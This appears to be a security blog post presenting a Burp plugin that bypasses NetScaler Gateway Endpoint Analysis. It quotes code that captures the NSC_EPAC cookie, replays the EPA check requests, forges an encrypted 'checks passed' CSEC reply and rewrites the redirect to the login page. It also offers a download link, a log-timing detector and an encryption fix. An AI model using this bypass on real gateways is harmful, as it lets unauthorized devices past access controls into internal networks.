NetScaler EPA Bypass Burp plugin


“On NetScaler Gateway, End Point Analysis (EPA) can be configured to check if a user device meets certain security requirements and accordingly allow access of internal resources to the user.”

Based on Lucky0x0D’s research. “The NetScaler does this by running a client on the user’s machine. […]. It connects to the NetScaler, receives a list of conditions, checks those conditions on the client device and then sends the NetScaler Gateway a result of pass or fail.

On the NetScaler this EPA communication can be configured to be in plaintext or be encrypted. When the NetScaler is configured without ‘Client Security Encryption’ the EPA check is trivial to bypass.”

This Burp plugin is a fork of the aforementioned code that will listen for “Pre-Authentication Endpoint Analysis” requests and reply to the server that these were passed.

For more information about what takes place under the hood, I suggest you read the paper:

The plugin details

After the plugin is loaded, it listens for redirections to “/epa/epa.html” (from the proxy or repeater). The 302 response to this request carries the “NSC_EPAC” cookie, which is later used to construct the encryption key.

if response_info.getStatusCode() == 302:
    headers = response_info.getHeaders()
    # Only act on the gateway's redirect to the EPA page
    if "Location: /epa/epa.html" in headers:
        NSC_EPAC = self.get_NSC_EPAC_from_response(response_info)

It then performs the 3 requests needed to get the details of the checks and to reply with a success message:

epatype_response=self.do_request("/epatype", headers, service_info)
#[...]
epaq_response=self.do_request("/epaq", headers, service_info)
#[...]
epas_response=self.do_request("/epas", headers, service_info)

The encryption key is derived from the NSC_EPAC cookie and the date values on the requests; it is then used to encrypt the reply that is sent back to the server in the CSEC header.

# Encrypt the "checks passed" reply with the key derived from cookie, date and host
CSEC_response = self.get_CSEC_response(str(NSC_EPAC_cookie), date, str(service_info.getHost()), CSEC)
if CSEC_response:
    headers.append("CSEC: " + CSEC_response)
    epas_response = self.do_request("/epas", headers, service_info)

If the above steps succeed, the user is redirected to the login page without having to run the EPA client software.

if self.bypassNSEPA(NSC_EPAC, currentMessage.getHttpService()):
  # If successful bypass, redirect to /vpn/index.html
  response=self._helpers.bytesToString(currentMessage.getResponse())
  response=response.replace("/epa/epa.html", "/vpn/index.html")
  currentMessage.setResponse(self._helpers.stringToBytes(response))
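From the gateway operator's side, the sequence above (/epatype, then /epaq, then /epas answered with a CSEC header) is exactly what a genuine EPA client also produces, so the only observable difference in access logs is timing: a real client has to run its checks on the device before it can answer, whereas an automated reply completes the whole cycle almost instantly. The following detector is an added example written for this post, not part of the plugin or of Lucky0x0D's code; the log line format, the request methods, the sample IPs and timestamps, and the 3-second threshold are all constructed assumptions that would need to be adapted to a real log source.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed access-log format for this example: '<ip> [<ISO timestamp>] "<method> <path>" <status>'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d{3})$'
)

# The three EPA endpoints the post describes, in the order the client uses them
EPA_PATHS = ("/epatype", "/epaq", "/epas")

# Constructed sample log: 10.0.0.5 behaves like a client that spends time on its checks,
# 10.0.0.9 completes the whole cycle within one second.
SAMPLE_LOG = """\
10.0.0.5 [2024-01-01T10:00:00] "GET /epa/epa.html" 200
10.0.0.5 [2024-01-01T10:00:02] "POST /epatype" 200
10.0.0.5 [2024-01-01T10:00:03] "POST /epaq" 200
10.0.0.5 [2024-01-01T10:00:12] "POST /epas" 200
10.0.0.5 [2024-01-01T10:00:13] "POST /epas" 200
10.0.0.9 [2024-01-01T10:05:00] "GET /epa/epa.html" 200
10.0.0.9 [2024-01-01T10:05:00] "POST /epatype" 200
10.0.0.9 [2024-01-01T10:05:00] "POST /epaq" 200
10.0.0.9 [2024-01-01T10:05:00] "POST /epas" 200
10.0.0.9 [2024-01-01T10:05:01] "POST /epas" 200
"""


def parse_log(text):
    """Turn log lines into (ip, timestamp, path, status) tuples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append((m.group("ip"), datetime.fromisoformat(m.group("ts")),
                       m.group("path"), int(m.group("status"))))
    return events


def find_epa_flows(events):
    """Per client, split EPA hits into cycles that start at /epatype and report each cycle
    that also contains /epaq and /epas, with the seconds from /epatype to the last /epas."""
    per_client = defaultdict(list)
    for ip, ts, path, _status in sorted(events, key=lambda e: e[1]):
        if path in EPA_PATHS:
            per_client[ip].append((ts, path))
    flows = []
    for ip, hits in per_client.items():
        cycles = []
        for ts, path in hits:
            if path == "/epatype":
                cycles.append([])          # a new check cycle begins
            if cycles:
                cycles[-1].append((ts, path))
        for cycle in cycles:
            paths = [p for _, p in cycle]
            if "/epaq" in paths and "/epas" in paths:
                last_epas = max(ts for ts, p in cycle if p == "/epas")
                flows.append({"ip": ip, "start": cycle[0][0],
                              "seconds": (last_epas - cycle[0][0]).total_seconds()})
    return flows


def flag_fast_flows(flows, min_seconds=3.0):
    """Return cycles completed faster than min_seconds. The threshold is an assumption:
    a client that really runs device checks needs some time before it can answer /epas."""
    return [f for f in flows if f["seconds"] < min_seconds]


def suspicious_clients(log_text=SAMPLE_LOG, min_seconds=3.0):
    """Convenience entry point: IPs whose EPA cycle finished implausibly fast."""
    return [f["ip"] for f in flag_fast_flows(find_epa_flows(parse_log(log_text)), min_seconds)]


if __name__ == "__main__":
    for flow in find_epa_flows(parse_log(SAMPLE_LOG)):
        print(flow["ip"], flow["start"].isoformat(), "%.1fs" % flow["seconds"])
    print("fast cycles:", suspicious_clients())
```

The timing heuristic is a signal to investigate, not proof of anything on its own; the durable fix the quoted research points to is enabling Client Security Encryption on the gateway so that a plaintext "pass" reply is not accepted in the first place.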

Download Link
